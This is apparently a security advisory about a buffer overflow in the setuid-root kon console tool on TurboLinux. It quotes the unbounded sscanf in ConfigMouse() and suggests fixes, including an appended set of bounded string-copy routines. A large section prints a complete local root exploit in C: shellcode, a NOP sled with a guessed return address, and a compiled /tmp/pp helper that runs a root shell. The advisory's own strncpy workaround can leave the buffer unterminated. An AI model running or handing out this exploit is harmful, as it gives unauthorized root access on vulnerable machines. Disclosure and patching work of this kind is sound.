Linux /usr/bin/kon Buffer Overflow Vulnerability
Release date: 2000-05-11
Update date: 2000-05-11
Affected systems:
TurboLinux 1.0 / kon2-0.3.7-3.i386.rpm
TurboLinux 2.0 / kon2-0.3.8-10TL.i386.rpm
TurboLinux 3.0 / kon2-0.3.8-11TL.i386.rpm
TurboLinux 4.2 / kon2-0.3.8-13.i386.rpm
Description:
/usr/bin/kon is a console display tool that is installed setuid root. Passing a very long string to its -MOUSE option causes a buffer overflow, so a local user can obtain root privileges.
The problem lies in the code that handles the -MOUSE argument, the ConfigMouse() function in src/mouse.c:
<....>
static int ConfigMouse(const char *config)
{
    struct mouseconf *p;
    char name[MAX_COLS];      /* <--- fixed-size buffer */

    mouseType = MOUSE_NONE;
    mInfo.has_mouse = FALSE;
    sscanf(config, "%s", name);
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    /* the overflow happens here: "%s" has no field width, so the token
       is copied into name[] regardless of its length */
<....>
            DefineCap("MouseDev", ConfigMouseDev, "/dev/mouse");
            return SUCCESS;
        }
    }
    warn("unknown mouse type `%s' ignored; assuming no mouse\r\n", name);
    return SUCCESS;
}
<....>
<* Source: UNYUN <shadowpenguin@backsection.net>
   http://shadowpenguin.backsection.net
*>
Test method:
WARNING
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
/*
   /usr/bin/kon, which is installed on the TurboLinux series by default, is a
   suid program. It overflows if a long argument is specified with the -MOUSE
   option. I (Unyun) coded an exploit for Linux; a local user can obtain root
   privilege.
 */
/*==========================================================================
   Linux kon/kon2 Exploit for Linux
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  ==========================================================================*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>     /* strcat, memset, strncpy, strlen */
#include <unistd.h>     /* execl */

#define KON_PATH "/usr/bin/kon"
#define RET_ADR  260        /* offset of the saved return address within the argument */
#define JMP_OFS  0x2474     /* distance below the current ESP used as the jump target */
#define CODE_OFS 320        /* offset of the shellcode within the argument */
#define MAXBUF   8000
#define NOP      0x90
#define SHELL    "/tmp/pp"
#define COMPILER "gcc"

/* shellcode; the path of the helper program is appended to it by strcat() in main() */
char exec[80]=
"\xeb\x31\x5e\x89\x76\x08\x31\xc0\x31\xd2\xb2\x04\x88\x46\x07\x01"
"\xd6\x89\x46\x08\x29\xd6\xb0\x08\xfe\xc0\xfe\xc0\xfe\xc0\x89\xf3"
"\x8d\x4e\x08\x01\xd6\x8d\x56\x08\x29\xd6\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xca\xff\xff\xff"; // for kon/kon2 exploit

char xx[MAXBUF+1];
unsigned int ip,sp;
FILE *fp;

/* returns the current stack pointer (left in EAX by the inline asm) */
unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax");
}

int main(void)
{
    strcat(exec,SHELL);
    /* write and compile the helper program that the shellcode runs */
    sprintf(xx,"%s.c",SHELL);
    if ((fp=fopen(xx,"w"))==NULL){
        printf("Can not write to %s\n",xx);
        exit(1);
    }
    fprintf(fp,"main(){setuid(0);setgid(0);system(\"/bin/sh\");}");
    fclose(fp);
    sprintf(xx,"%s %s.c -o %s",COMPILER,SHELL,SHELL);
    system(xx);

    sp=get_sp();
    printf("ESP = %x\n",sp);
    memset(xx,NOP,MAXBUF);                    /* fill the argument with NOPs */
    ip=sp-JMP_OFS;
    xx[RET_ADR  ]=ip&0xff;                    /* guessed address, little-endian */
    xx[RET_ADR+1]=(ip>>8)&0xff;
    xx[RET_ADR+2]=(ip>>16)&0xff;
    xx[RET_ADR+3]=(ip>>24)&0xff;
    strncpy(xx+CODE_OFS,exec,strlen(exec));   /* place the shellcode */
    xx[MAXBUF-1]=0;
    execl(KON_PATH,"kon","-MOUSE",xx,(char *) 0);
    return 0;
}
Recommendation:
Temporary workaround:
Replace
    sscanf(config, "%s", name);
with the following statement:
    strncpy(name, config, MAX_COLS);
and recompile kon.
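Two bounded replacements for the name[] copy in ConfigMouse(), added here as an example and not code from kon or from the advisory; MAX_COLS is an assumed value. Unlike a bare strncpy(), both always leave name[] NUL-terminated, and the first reports an over-long token instead of silently truncating it.

```c
#include <stdio.h>
#include <string.h>

#define MAX_COLS 128   /* assumed size of kon's name[] buffer */

/* Copy the first whitespace-delimited token of config into name (n bytes).
 * Returns the token length, or -1 if the token would not fit; the caller
 * can then warn and fall back to "no mouse" instead of overrunning name[]. */
int copy_mouse_name(const char *config, char *name, size_t n)
{
    size_t start = strspn(config, " \t\r\n");          /* %s skips leading blanks too */
    size_t len = strcspn(config + start, " \t\r\n");   /* length of the first token */
    if (n == 0)
        return -1;
    if (len >= n) {
        name[0] = '\0';                                 /* no room for token + NUL */
        return -1;
    }
    memcpy(name, config + start, len);
    name[len] = '\0';                                   /* always terminated */
    return (int)len;
}

/* Alternative: keep sscanf but give %s a field width of MAX_COLS-1 so it
 * can never store more than name[] holds. The format is built at run time
 * so the width cannot drift from MAX_COLS. Returns the stored length,
 * or -1 when no token was read. */
int scan_mouse_name(const char *config, char name[MAX_COLS])
{
    char fmt[16];
    snprintf(fmt, sizeof fmt, "%%%ds", MAX_COLS - 1);   /* yields "%127s" */
    return sscanf(config, fmt, name) == 1 ? (int)strlen(name) : -1;
}

/* Harness: feed a constructed token of len 'A' characters through either
 * routine and report what it returns, to confirm nothing overflows. */
int long_token_result(size_t len, int use_sscanf)
{
    char config[1024], name[MAX_COLS];
    if (len >= sizeof config)
        len = sizeof config - 1;
    memset(config, 'A', len);
    config[len] = '\0';
    return use_sscanf ? scan_mouse_name(config, name)
                      : copy_mouse_name(config, name, sizeof name);
}

char name_buf[MAX_COLS];   /* scratch buffer for callers */
```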